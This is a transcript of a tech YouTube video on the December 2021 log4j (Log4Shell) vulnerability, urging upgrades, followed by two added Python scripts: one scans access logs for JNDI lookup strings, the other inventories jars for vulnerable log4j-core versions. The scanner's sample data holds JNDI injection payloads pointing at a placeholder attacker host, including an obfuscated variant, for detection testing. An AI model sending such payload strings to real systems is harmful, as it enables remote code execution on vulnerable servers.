Critical Vulnerability In Java log4j Affecting UniFi, Apple, Minecraft, and Many Others!

Captions
Happy Friday, December 10th of 2021. Well, not a happy Friday for anyone dealing with the vulnerability that was recently disclosed on, well, just December 9th of 2021 in the Java log4j library. This is a pretty widespread application, affecting companies ranging from Tesla to Twitter to Minecraft, and yes, it apparently is actively exploitable in Minecraft, so there's a lot of servers being pushed out and updated right now. I'll be covering from the blog post here over at Huntress, along with a Reddit post, and of course some details that I want to cover, including the fact that this has a base CVSS score of 10. Yes, 10, the worst you can get.

Let's start, though, with a big thanks to Kevin Beaumont, who's been discussing this. If you're not familiar with or don't follow Kevin Beaumont, aka GossiTheDog, he does some really great and solid security research, definitely worth following on Twitter, and I'd like to thank him for this wonderful logo, because I think every exploit needs a logo, and I actually like this one because it's a trivial exploit with a trivially drawn logo in MS Paint. So that made me smile, because nothing else about this vulnerability makes me smile, with one more minor exception: John Hammond targeting Minecraft, because why not? If you're going to do a proof of concept on something, why not start with the game? Obviously this is very serious, but let's talk about just how trivial this is.

There's a lot of places affected by this. What should you do now? This is where we'll start: if your organization uses the log4j library, upgrade to, and they've got the new version right here, log4j 2.15.0 rc2. But I want to talk about where your risk factor is and kind of how this actually works, because the how-it-works part is mind-blowingly simple, and the attack vector is extremely trivial for threat actors. A single string of text can trigger an application to reach out to an external location if it is logged via the vulnerable instance of log4j.

So if you have a web server, a UniFi controller, a mail server, any different service that runs, maybe you want logging. And when you think about how it logs, it's going to take this log information and, you know, you write it to /var/log in the Linux world; that's pretty common. And the facilities that write it are just kind of boring: they're going to take the log data and drop it there, and boring is okay. But sometimes you want to look at it in a little bit more depth and maybe take some action on it, and that's where log4j comes in. So you actually take in your logs, prior to just settling them somewhere for archival reasons, and you'll actually parse them with log4j. That's where the problem comes in, and this is what makes this such an easy vulnerability to exploit.

I've already seen these exploits coming against my own servers, but just because you see the exploit being targeted at you does not mean it can be exploited, because of the way it works. Any of these logs being collected: the people sending out the requests, the threat actors that have set up beacons, are just hammering away at Apache servers and anything they can find publicly available on the internet, sending and seeing what comes back. They send that command, and if the back end of your system is using this log4j, and this is where companies like Tesla, Twitter, and Elasticsearch and all these different services have this, if they're using it to parse that log data, it's as trivial as that command right here. They put in this right here, and that's it. It will then execute at the permission level that that log4j library has, so if your vulnerable application has a high-level permission, it now can start executing whatever payload was sent to it. So it's not necessarily that everything that depends on this library is going to be exploitable, but there's a high probability that things that depend on this library are.

Essentially this comes down to, you know, wondering how long this has been around. We'll actually start here in 2013. So I wanted to do a little bit of research, because I was curious: you know, is this new, is this from some update, something opened up and it was unparsed? I did find a few references to this, and it makes complete sense. This was implemented right around 2013, and it was lookup plugin support. Basically, what this log facility does is, if you want to take more action on your log and actually have it trigger different things, this is actually very handy. We can say, hey, look up these resources, do this information: not only look at the log but then take action on it. So we can have our server do some type of defined actions and look things up based on the information we find in a log. So that implementation was done, but it wasn't done properly, because they didn't sanitize the input.

So the execution part comes because of the way you can simply use these couple of commands, as pointed out right here. If you add this right here, that's it. It will then go, oh, I think you mean to run this. So you're taking kind of an advantage of unparsed information that was supposed to be parsed out and sanitized before it went through, so it can run the commands, jumping it right to the command. So you're injecting a command in a spot where the person who would have written the logging tool would have had their command. So it's a little bit of a clever hack, well, in terms of finding it, but really trivial in terms of exploiting it. So any type of server that happens to be sending input data through this logging facility potentially could be exploited. There's going to be all kinds of nuance to how different companies actually do their implementation, but obviously it's big enough to have this high of a CVSS score and cause a lot of stir in the tech industry right now, because it's obviously very, very exploitable.

I was actually happy to see UniFi had a patch out right away. There's no known, as of the making of this video, vulnerabilities in UniFi from it, but the fact that they're dependent on that library, there could be some way, even if it's not an obvious way, that you could send or get a UniFi endpoint to create a log that it would parse and then do that. That becomes a little bit tricky because it's not exactly open to the public; it's more like the logging facility of each device could possibly make this malformed thing, but then could you take over a device and use it? This is where a lot of people, and other friends of mine, including Reilly Chase over at Hostifi, who's been pushing out patches as well, a lot of people are looking to see if there's a deeper vulnerability that can be found within this. Because I think it's very important to be clear when I say right now there's none known, but as long as we know that library is hanging out in different applications, that gives you the idea of poking at each thing until there's a way you can get around it and see if it will actually execute code. And this is what people have been doing. I've seen people do things like, well, a little bit confusing, but it looks like they could rename even their phone and put in the payload as the name of a phone, and allegedly, based on a Twitter post I've seen, that was a way they were able to see if it would beacon out and do a lookup. So anything that puts you a little bit closer to there, because like I said, Apple, Twitter, lots of places are using this particular log library; it is immensely popular.

So this is going to be kind of the ripple effect, where even though we see a lot of major companies doing it now, we know there's probably a lot of things that later on down the road someone will be looking things up and find an application that never updated this particular library and then start poking away at it. So it's hard to really determine the entire extent. Having that library does not always mean exploitable, but it certainly means potential for exploit, and we'll just kind of have to watch as companies patch this, and hopefully they patch it. It's better to patch first before you find out there's a vulnerability, which is what UniFi did: they updated it to the newer version of the library that parses the data properly. But I've even seen companies like VMware, and I don't know what version they're using, but even large companies like that are still using some of these libraries in there, so we're going to probably see just a chain of updates that are going on for a long time on this.

I'll leave links to everything I talked about. Leave your thoughts and comments down below. If you have a system you need to patch, patch it. If you're running a UniFi controller, which I know a lot of my audience do, go ahead and update that to the latest version; as of today it was released, and I'll leave a link to that down below as well. All right, thanks, and thank you for making it all the way to the end of this video. If you've enjoyed the content, please give us a thumbs up. If you would like to see more content from this channel, hit the subscribe button and the bell icon. If you'd like to hire us for a project, head over to lawrencesystems.com and click the Hire Us button right at the top. To help this channel out in other ways, there's a join button here for YouTube and a Patreon page where your support is greatly appreciated. For deals, discounts, and offers, check out our affiliate links in the description of all of our videos, including a link to our shirt store, where we have a wide variety of shirts that we sell, and designs come out, well, randomly, so check back frequently. And finally, our forums, forums.lawrencesystems.com, is where you can have a more in-depth discussion about this video and other tech topics covered on this channel. Thanks again for watching, and I look forward to hearing from you.
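The video explains that the exploit is "a single string of text" which, once it reaches a vulnerable log4j instance, makes the application perform a lookup against an external location, and the speaker mentions already seeing these strings hit his own servers. The script below is an added example, not part of the video or of any Lawrence Systems tooling: it scans access-log lines for log4j JNDI lookup strings so a defender can triage what is being thrown at a server. The log lines and the host name `attacker.example` are constructed sample data. It also folds away the `${lower:x}`/`${upper:x}` wrapping that has been seen in the wild, because a plain search for `${jndi:` misses that form.

```python
import re

# Constructed sample lines in combined access-log format (not from the video);
# "attacker.example" is a placeholder host. Lines 3 and 4 are benign: line 4
# contains a harmless-looking Log4j-style lookup that is not a JNDI lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${${lower:j}ndi:rmi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:01 +0000] "GET /index.html HTTP/1.1" 200 3000 "-" '
    '"Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:03:05 +0000] "GET /api/${date:yyyy} HTTP/1.1" 404 0 "-" '
    '"curl/7.79"',
]

# ${lower:x} and ${upper:x} are ordinary Log4j lookups that evaluate to "x".
# When a single character of "jndi" is wrapped this way, a literal "${jndi:"
# match fails, so the detector unwraps them (innermost first) before matching.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)

# After unwrapping, a JNDI lookup reads ${jndi:<scheme>://<host>...}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}:\s]+)", re.IGNORECASE)


def normalize(text):
    """Collapse nested case lookups until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line):
    """Return the scheme and host of every JNDI lookup embedded in one line."""
    return [
        {"scheme": m.group(1).lower(), "host": m.group(2)}
        for m in _JNDI.finditer(normalize(line))
    ]


def scan(lines):
    """Scan log lines; each hit records line number, scheme, host and raw line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            hits.append({"line_no": number, "raw": line, **hit})
    return hits


if __name__ == "__main__":
    # Running this file on the constructed sample reports lines 1 and 2.
    for hit in scan(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: jndi lookup via {hit['scheme']} to {hit['host']}")
```

A hit in the web-server log means the string reached your edge; as the video stresses, it only becomes a compromise if a vulnerable log4j instance behind that edge logs the field. The scheme and host from each hit are what you would hand to the network team to check egress logs for an actual outbound connection.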
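The video's advice is to upgrade any use of the log4j library to the fixed 2.15.0 release, and it points out that having the library on a system is what creates the exposure even when no exploit path is known yet. As an added example (not from the video, and not a Ubiquiti or Lawrence Systems tool), the script below walks a directory tree, opens every `.jar`, and reports those that bundle log4j-core's `JndiLookup` class together with the version from the jar's manifest, flagging anything below 2.15.0. The sample jars it builds are constructed placeholders with empty class entries so the check can be run offline; the version comparison trusts `Implementation-Version` in the manifest, so a shaded application jar that bundles log4j under the application's own version still needs a manual look.

```python
import os
import re
import tempfile
import zipfile

# The lookup class that log4j-core ships; its presence marks a jar as carrying log4j 2.x.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Version the video says to upgrade to.
FIXED_VERSION = (2, 15, 0)


def parse_version(text):
    """Turn '2.14.1' or '2.15.0-rc2' into a comparable tuple; None if unparseable."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not match:
        return None
    return (int(match.group(1)), int(match.group(2)), int(match.group(3) or 0))


def manifest_field(zf, field):
    """Read one header from META-INF/MANIFEST.MF inside an open zip, if present."""
    try:
        data = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in data.splitlines():
        if line.startswith(field + ":"):
            return line.split(":", 1)[1].strip()
    return None


def inspect_jar(path):
    """Return a finding for a jar that bundles log4j-core, or None if it does not."""
    with zipfile.ZipFile(path) as zf:
        if JNDI_LOOKUP_CLASS not in set(zf.namelist()):
            return None
        # Caveat: a shaded app jar reports the app's version here, not log4j's.
        version = parse_version(manifest_field(zf, "Implementation-Version"))
    if version is None:
        status = "log4j-core present, version unknown: inspect manually"
    elif version < FIXED_VERSION:
        status = "needs upgrade"
    else:
        status = "at or above 2.15.0"
    return {"jar": os.path.basename(path), "version": version, "status": status}


def inventory(root):
    """Walk a directory tree and collect findings for every jar carrying log4j-core."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                finding = inspect_jar(os.path.join(dirpath, name))
                if finding:
                    findings.append(finding)
    return sorted(findings, key=lambda f: f["jar"])


def build_constructed_sample(root):
    """Write three constructed jars (placeholder entries, not real classes) into root."""
    def write_jar(name, version, with_lookup):
        with zipfile.ZipFile(os.path.join(root, name), "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF",
                        f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            if with_lookup:
                zf.writestr(JNDI_LOOKUP_CLASS, b"")  # empty placeholder entry
    write_jar("log4j-core-2.14.1.jar", "2.14.1", True)   # pre-fix version
    write_jar("log4j-core-2.15.0.jar", "2.15.0", True)   # the version the video recommends
    write_jar("other-lib-1.0.jar", "1.0", False)         # unrelated library
    return root


def demo():
    """Build the constructed sample in a temporary directory and inventory it."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_sample(root)
        return inventory(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['jar']}: {finding['status']}")
```

Point `inventory()` at an application's install directory (for a UniFi controller on Linux, wherever its lib directory lives) to get a first-pass list of log4j-core jars and versions before deciding what to patch; the jars it flags are the ones to upgrade or confirm against the vendor's advisory.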
Info
Channel: Lawrence Systems
Views: 87,357
Keywords: LawrenceSystems, java exploit, log4j exploit minecraft, log4j exploit poc, minecraft exploit, log4j step by step, log4j, log4j exploit, log4j rce, log4j vulnerability, log4j2 exploit, log4j zero day, log4j2, log4j remote code execution exploit in minecraft, log4j tutorial in java, log4j exploit explained, log4j2 minecraft
Id: CvkUPvIMM7o
Length: 8min 51sec (531 seconds)
Published: Fri Dec 10 2021